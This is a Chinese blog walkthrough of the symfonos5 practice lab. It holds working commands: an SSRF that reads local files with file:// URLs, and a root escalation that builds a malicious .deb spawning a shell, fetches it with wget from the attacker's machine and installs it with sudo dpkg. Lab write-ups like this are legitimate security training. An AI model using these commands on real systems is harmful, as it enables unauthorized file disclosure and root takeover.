学习笔记-symfonos5-WalkThrough

最新推荐文章于 2024-07-20 08:27:55 发布
最新推荐文章于 2024-07-20 08:27:55 发布
阅读量242 收藏
点赞数
文章标签: 学习 php 服务器 开发语言 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_35360663/article/details/127692812
版权

symfonos5-WalkThrough

免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.

靶机地址

Description

Beginner real life based machine designed to teach people the importance of understanding from the interior.

Tested on VMware and Virtualbox

知识点

  • ssrf
  • ldap
  • dpkg 提权

实验环境

环境仅供参考

  • VMware® Workstation 15 Pro - 15.0.0 build-10134415
  • kali : NAT 模式,192.168.141.134
  • 靶机 : NAT 模式

前期-信息收集

开始进行 IP 探活

nmap -sP 192.168.141.0/24

排除法,去掉自己、宿主机、网关, 192.168.141.151 就是目标了

扫描开放端口

nmap -T5 -A -v -p- 192.168.141.151

SSH、web、ldap,ldap 一般比较少见,先从熟悉的 web 开始把

老样子,啥都没有,爆破目录,字典自 https://github.com/ffffffff0x/AboutSecurity/blob/master/Dic/Web/Directory/fast-scan.txt

./gobuster dir -u 192.168.141.151 -w fast-scan.txt

访问下这个 admin.php 和 home.php

home.php 会将我重定向到 admin.php,看看 html 源码

curl http://192.168.141.151/home.php

这个熟悉的 127.0.0.1 看上去是 ssrf 啊,读文件试试

中期-漏洞利用

curl http://192.168.141.151/home.php\?url\=file:///etc/passwd

尝试读 admin.php 的源码

curl http://192.168.141.151/home.php\?url\=file:///var/www/html/admin.php

看上去是 LDAP 的凭证。

ldap管理工具有 ldapadmin,JXplorer 等,这里就用 ladpadmin 测试了

访问 https://sourceforge.net/projects/ldapadmin/ 下载安装包,我下的是windows版的,就不演示 linux 平台了

连接后可以看到有个 zeus 用户和其密码

SSH 连接上去,寻找提权的方法

后期-提权

sudo -l

dpkg 以 root 权限运行,上 https://gtfobins.github.io/ 找下 dpkg 相关的内容

在 kali 上运行

gem install --no-document fpm
TF=$(mktemp -d)
echo 'exec /bin/sh' > $TF/x.sh
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF

python -m SimpleHTTPServer 8080

完成后靶机下载POC

wget 192.168.141.134:8080/x_1.0_all.deb
sudo dpkg -i x_1.0_all.deb

提权成功,感谢靶机作者 Zayotic,和 mzfr 分享的 writeup

点击关注,共同学习!安全狗的自我修养

github haidragon

https://github.com/haidragon

C-haidragon
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
笔记-webpack5学习指南-V1.0
08-29
笔记-webpack5学习指南-V1.0
vulnhub-Symfonos5
qq_41810304的博客
03-06 591
下载地址:https://www.vulnhub.com/entry/symfonos-5,415/ 前言: 文中提到的工具和漏洞仅供学习。此文较长看起来有点费时间,并且靶机做起来的时候思维有点混乱,所以也写得不是很有逻辑性。作为小白(省略) Kali:192.168.109.129 目标机:192.168.109.142 端口扫描: TCP: 漏洞挖掘: 从扫描信息来看,先访...
oscp——symfonos:5
王嘟嘟的博客
01-24 839
0x00 前言 这个是vulnhub的第十一台机子,其实之前在做ReconForce-01但是由于vmbox机子的问题,导致没有弄出来。所以就转手来做这个 链接 https://www.vulnhub.com/entry/symfonos-5,415/ 0x01 信息收集 ip信息收集 端口信息收集 0x02 攻击 1.端口 这里开放了22,80,389,636,由于多次做题的经验,不直接进行...
symfonos靶机
haha1314的博客
08-10 759
一、 信息收集 存活主机 开放端口 Enum4linux 猜测aeolus可能为用户名 尝试爆破:sergioteamo 登陆 4 转到msf里面 在检查网络相关信息时,发现可疑之处,靶机一直监听其本机的8080端口,且只允许来自靶机自身的连接 这里自然想到利用端口转发,此处利用portfwd端口转发/重定向工具,其集成到metasploit内, 然后访问自己的9000端...
oscp——HA: Wordy
王嘟嘟的博客
02-18 1213
0x00 前言 这个是做的第31台机子了。 0x01 信息收集 0x02 Web 访问一下 然后跑一下目录,拿到一个目录http://192.168.0.117/wordpress/ 是一个wp的站,扫一下插件和用户 这里mail-masta查一下洞 有一个EIF 还有一个sql需要账号密码 reflex gallery这个插件的洞,有一个文件上传,进行上传 site edit...
oscp——sunset: dusk
王嘟嘟的博客
01-28 1009
0x00 前言 这个是第十三台机子,最近做vulnhub做的,一道能自己独立做出来的的都没有,简直是对自信心的打击,这个东西感觉就是在和攻略关卡一样,只能不停的提高自己的意识,等提高到一种程度的时候才可以做出一些东西。 愿努力和我长存。 E788B1E78E8BE5989FE5989FE88081E5A986 链接 0x01 ...
autokeras学习笔记-安装篇
06-07
autokeras学习笔记-安装篇
JSP学习笔记-2.pdf
11-28
JSP学习笔记-2.pdf
android学习笔记-clip.pdf
11-15
android学习笔记-clip.pdf
PADS学习笔记-入门篇
07-17
如何设置参数? 如何操作软件? 整个流程,很清晰。 一学就会。
symfonos2靶机-Walkthrough
ins1ght的博客
09-07 1723
symfonos2靶机展开的一次“渗透测试”。你可以看到一只菜鸟的个人思路、对网上已有Writeup的复现以及中间遇到的一些问题。
oscp——symfonos:2
王嘟嘟的博客
01-16 4557
0x00 前言 这个是练习的第5个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-2,331/ 参考文章 https://www.anquanke.com/post/id/182378 https://blog.csdn.net/weixin_44214107/article/details/100587936 0x01 实验 1.信息收集 1.1 ...
oscp——symfonos:4(未完成)
王嘟嘟的博客
01-16 669
0x00 前言 这个是练习的第7个机子。 目标地址 https://www.vulnhub.com/entry/symfonos-4,347/ 0x01 实验 1.信息收集 1.1 ip收集 1.2 开放端口
昇思25天学习打卡营第14天|LLM-文本解码原理--以MindNLP为例
wwt72的博客
07-17 734
限制输出序列的最大长度为50个token。top-p=0.95,top-p采样表示在每一步生成token时,只从概率分布中累计概率达到95%的token中进行采样,有助于保持生成文本的流畅性和质量,同时允许一些低概率的token被选中,从而增加多样性。表示禁用了top-k采样,因为在top-k采样中,通常是从概率最高的k个token中随机选择一个token作为下一个输出,而这里设置为0表示不限制token的选择,实际上这将等同于使用 softmax 概率分布直接进行采样。这有助于提高生成文本的多样性。
卷积神经网络学习问题总结
weixin_61681867的博客
07-17 505
均方误差函数(MSE)适用于回归任务,如预测房价、预测股票价格等。
kubernetes学习日志(七)
qq_47037022的博客
07-18 576
本文记录了service管理,ingress管理,Dashboard管理插件,集群鉴权策略,角色与全局角色,赋权与全局角色赋权。
手写简易版Spring IOC容器02【学习
weixin_44794897的博客
07-19 511
其中applyPropertyValues用于从beanDefinition中读取属性的配置信息然后通过BeanUtil(hutool-all中提供的类)为其赋值@Overridetry {// 创建bean实例Class<?if (null!break;// 设置属性值try {// 从beanDefinition中获取property通过Resource获取文件流。
博客前端项目学习day03——框架页
qq_53237241的博客
07-19 370
【代码】博客前端项目学习day03——框架页。
昇思25天学习打卡营第16天|munger85
最新发布
MungerVC
07-20 363
MobileNet网络是由Google团队于2017年提出的专注于移动端、嵌入式或IoT设备的轻量级CNN网络,相比于传统的卷积神经网络首先安装依赖下载数据。
python学习笔记--皮大庆
08-14
《Python学习笔记》是由皮大庆编写的一本关于Python语言学习的教材。在这本书中,作者详细介绍了Python语言的基础知识、语法规则以及常用的编程技巧。 首先,作者简要介绍了Python语言的特点和优势。他提到,Python是一种易于学习和使用的编程语言,受到了广大程序员的喜爱。Python具有简洁、清晰的语法结构,使得代码可读性极高,同时也提供了丰富的库和模块,能够快速实现各种功能。 接着,作者详细讲解了Python的基本语法。他从变量、数据类型、运算符等基础知识开始,逐步介绍了条件语句、循环控制、函数、模块等高级概念。同时,作者通过大量的示例代码和实践案例,帮助读者加深对Python编程的理解和应用。 在书中,作者还特别强调了编写规范和良好的编程习惯。他从命名规范、注释风格、代码缩进等方面指导读者如何写出清晰、可读性强的Python代码。作者认为,良好的编程习惯对于提高代码质量和提高工作效率非常重要。 此外,作者还介绍了Python的常用库和模块。他提到了一些常用的库,如Numpy、Pandas、Matplotlib等。这些库在数据处理、科学计算、可视化等领域有广泛的应用,帮助读者更好地解决实际问题。 总的来说,《Python学习笔记》是一本非常实用和全面的Python学习教材。通过学习这本书,读者可以系统地学习和掌握Python编程的基础知识和高级应用技巧,为以后的编程学习和工作打下坚实的基础。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C-haidragon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值